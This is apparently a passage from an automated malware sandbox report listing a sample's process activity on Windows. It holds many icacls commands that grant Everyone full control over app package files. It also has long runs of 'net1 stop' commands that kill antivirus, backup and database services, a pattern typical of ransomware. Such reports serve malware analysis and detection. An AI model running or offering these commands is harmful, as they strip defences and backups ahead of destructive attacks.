  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:5588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13928
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14904
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:17008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:17140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:14864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:17076
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:17040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13736
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:13576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:10224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14692
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:17308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13424
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13444
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16988
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:10176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7904
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6696
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14564
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7184
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:11632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9084
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12848
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:12792
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6940
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:5412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9028
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:9788
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5784
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9316
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:17340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:3896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9464
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8900

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:12672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:13744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:14028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:13752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:12380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:12356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:12332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:12324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:12316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:12004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:12012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:11652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:14308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:14300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:14292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:14260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:14252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:14236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:14204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:14188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:14180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:14164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:14148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:14036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:11032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:10172

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:8596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:14520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:15056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:15700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:15692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:14912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:14904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:14896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:14880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:14872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:14864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:14848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:14840

C:\Windows\system32\net1.exe
